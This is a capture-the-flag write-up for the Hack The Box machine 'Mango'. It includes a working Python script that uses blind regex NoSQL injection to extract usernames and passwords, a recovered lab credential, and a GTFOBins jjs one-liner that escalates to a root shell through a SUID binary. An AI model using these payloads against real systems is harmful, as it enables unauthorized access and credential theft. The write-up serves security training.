HTB Writeup: Mango

Sweet Sweet Ma(o)ngo

Enumeration

nmap

[email protected] Mango please nmap -sC -sV -T3 -oA nmap-tcp-all-ports -p- -iL ip.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-28 04:59 IST
Nmap scan report for 10.129.1.219 (10.129.1.219)
Host is up (0.080s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.29 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.40 seconds
  1. Web server is listening on TCP/80 and TCP/443. The SSL Certificate provides the domain name staging-order.mango.htb.
  2. On requesting the same with curl at TCP/80 responds with a 200 OK instead of 403 Forbidden as seen in nmap scan results.

Web applications

  1. Two different web applications are found to be running on TCP/80 and TCP/443.

  2. The TCP/80 provides with just a login form.

    Untitled

  3. TCP/443 provides a search engine like interface.

    Untitled

Initial Foothold

Blind NoSQL Injection

  1. The web applications were fuzzed for directories and files but no significant findings were made.

  2. On testing the login form (TCP/80) for SQL, and NoSQL injections, it is found to be vulnerable to blind regex based NoSQL Injection.

    Untitled

    Untitled

  3. Changing the parameters in the login form from username to username[$regex] and password to password[$regex] allows an attacker to match strings based on regex in the database and bypass the login functionality. The complete form in HTTP request would look like:

    username[$regex]=^.*&password[$regex]=^.*&login=login
    

    The regex ^.*matches any whole word. This can be used to enumerate username and password, by iterating on the loop with injection pattern as ^<CHAR_1>.*. If the request receives a HTTP 302, it is confirmed that the inserted character is the part of the username or password, whichever is being enumerated. Then, a new iteration of loop can be started and so on until the complete word is enumerated and the loop can be exited.

    Since one of the usernames available is known via the landing page after successful login ([email protected]), the username can be set to admin to skip directly to the password.

    Untitled

    Credentials are found to be admin:t9KcS3>!0B#2

  4. If username is left blank as default, it’ll always match a first and then follow to enumerate admin as username. To avoid this behavior and enumerate other possible usernames, a few manual iterations of the script can be done by setting just the first character of the username variable other than a.

  5. The following python script can automate the processes involved in 3. and 4. altogether:

    #!/usr/bin/env python3
    import pwn
    import requests
    import string
       
    general_status = pwn.log.progress("Trying character")
    possible_first_char_status = pwn.log.progress("Possible first characters")
    username_status = pwn.log.progress("Username")
    password_status = pwn.log.progress("Password")
    last_status_code = pwn.log.progress("Last status code")
       
    possible_first_chars = []
    usernames = []
    credentials = {}
       
    url = "http://staging-order.mango.htb/index.php"
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    wordlist = string.ascii_letters + string.digits + string.punctuation
    blacklist = ['*','+','.','?','|','&','$', '\\', '^']
       
    print("Enumerating possible first characters")
    for char in wordlist:
        if char in blacklist:
            continue
        general_status.status(char)
        body = f"username[$regex]=^{char}.*&password[$regex]=^.*&login=login"
        resp = requests.post(url, data=body, headers=headers, allow_redirects=False)
        last_status_code.status(repr(resp.status_code))
        if resp.status_code == 302:
            possible_first_chars.append(char)
            possible_first_char_status.status(repr(possible_first_chars))
       
    print("Enumerating usernames")
    for char in possible_first_chars:
        reached_end_of_wordlist = False
        username = char
        while not reached_end_of_wordlist:
            for i in range(len(wordlist)):
                if wordlist[i] in blacklist:
                    continue
                general_status.status(wordlist[i])
                body = f"username[$regex]=^{username + wordlist[i]}.*&password[$regex]=^.*&login=login"
                resp = requests.post(url, data=body, headers=headers, allow_redirects=False)
                last_status_code.status(repr(resp.status_code))
                if resp.status_code == 302:
                    username += wordlist[i]
                    username_status.status(username)
                    break
                if i == (len(wordlist) - 1):
                    reached_end_of_wordlist = True
                    usernames.append(username)
                    break
       
    reached_end_of_wordlist = False
    print("Enumerating password")
    for username in usernames:
        reached_end_of_wordlist = False
        password = ''
        while not reached_end_of_wordlist:
            for i in range(len(wordlist)):
                if wordlist[i] in blacklist:
                    continue
                general_status.status(wordlist[i])
                body = f"username={username}&password[$regex]=^{password + wordlist[i]}.*&login=login"
                resp = requests.post(url, data=body, headers=headers, allow_redirects=False)
                last_status_code.status(repr(resp.status_code))
                if resp.status_code == 302:
                    password += wordlist[i]
                    password_status.status(password)
                    break
                if i == (len(wordlist) - 1):
                    reached_end_of_wordlist = True
                    credentials.update({username: password})
                    break
       
    print(f"Found following credentials from the database:")
    print(credentials)
    

    Untitled

User access

  1. Using the credentials for mango from website database, SSH Session was achieved successfuly.

Untitled

  1. On looking at /etc/passwd, another user admin is available on the system. Using the credentials dumped from database, su admin allows to get a shell session as the user admin.

Privilege Escalation

Enumeration

  1. The find program can be used to find all the executable files which have SUID permissions set. (SUID bit enables the program to run with the privileges of the owner of the file. [ More info])

  2. The command can be as following:

    find / -perm -u=s uid 0 2>/dev/null
    # -perm -u=s -> to search only for files with SUID permission
    # uid 0 -> files owned by root
    # 2>/dev/null -> redirect stderr output to /dev/null for a cleaner output
    
    /bin/fusermount
    /bin/mount
    /bin/umount
    /bin/su
    /bin/ping
    /snap/core/7713/bin/mount
    /snap/core/7713/bin/ping
    /snap/core/7713/bin/ping6
    /snap/core/7713/bin/su
    /snap/core/7713/bin/umount
    /snap/core/7713/usr/bin/chfn
    /snap/core/7713/usr/bin/chsh
    /snap/core/7713/usr/bin/gpasswd
    /snap/core/7713/usr/bin/newgrp
    /snap/core/7713/usr/bin/passwd
    /snap/core/7713/usr/bin/sudo
    /snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /snap/core/7713/usr/lib/openssh/ssh-keysign
    /snap/core/7713/usr/lib/snapd/snap-confine
    /snap/core/7713/usr/sbin/pppd
    /snap/core/6350/bin/mount
    /snap/core/6350/bin/ping
    /snap/core/6350/bin/ping6
    /snap/core/6350/bin/su
    /snap/core/6350/bin/umount
    /snap/core/6350/usr/bin/chfn
    /snap/core/6350/usr/bin/chsh
    /snap/core/6350/usr/bin/gpasswd
    /snap/core/6350/usr/bin/newgrp
    /snap/core/6350/usr/bin/passwd
    /snap/core/6350/usr/bin/sudo
    /snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /snap/core/6350/usr/lib/openssh/ssh-keysign
    /snap/core/6350/usr/lib/snapd/snap-confine
    /snap/core/6350/usr/sbin/pppd
    /usr/bin/newuidmap
    /usr/bin/newgrp
    /usr/bin/gpasswd
    /usr/bin/passwd
    /usr/bin/newgidmap
    /usr/bin/run-mailcap
    /usr/bin/chfn
    /usr/bin/chsh
    /usr/bin/sudo
    /usr/bin/traceroute6.iputils
    /usr/bin/pkexec
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
    /usr/lib/policykit-1/polkit-agent-helper-1
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
    /usr/lib/openssh/ssh-keysign
    /usr/lib/snapd/snap-confine
    
  3. The interesting executable from the list is /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs

Exploitation

  1. The GTFO Bins provides a command line string that can allow non-privileged user to run jjswith SUID permissions to escalate the privileges.

    echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \[email protected]|sh\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()" | /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
    
  2. On executing the command, a successful shell as root is obtained.

    Untitled

The remote host is now completely compromised.

Avatar
Mayank Malik
CRTP | Incident Responder | Synack Red Team Member | Threat Analyst | Security Researcher | Cloud/Network Architect

Mayank Malik is a tech savvy person, Red Team Enthusiast, and likes to wander around to learn new stuff. Cryptography, Networking and System Administrations are his forte. He’s one of the Founding Members for CTF Team, Abs0lut3Pwn4g3, and Core Member at DC 91120 (DEFCON Community Group). Apart from the mentioned skills, he’s good at communication skills and is goal oriented person. Yellow belt holder at pwn.college in pursue of learning and achieving Blue Belt.

Related